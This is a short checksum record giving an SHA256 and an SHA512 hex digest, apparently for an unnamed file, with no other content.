SHA2561c09546ff82f588cf5b77ccd9c9bcee59a866b008425e4aa0ad40f68323ce3b8
SHA5123b184192903578fce1ad6251e5cbd98553fec2afb674ad81299266a3d67579f4c24782fad7fd95c656f892fcafac27a45543fa6397267b1c468a1c3f2121390b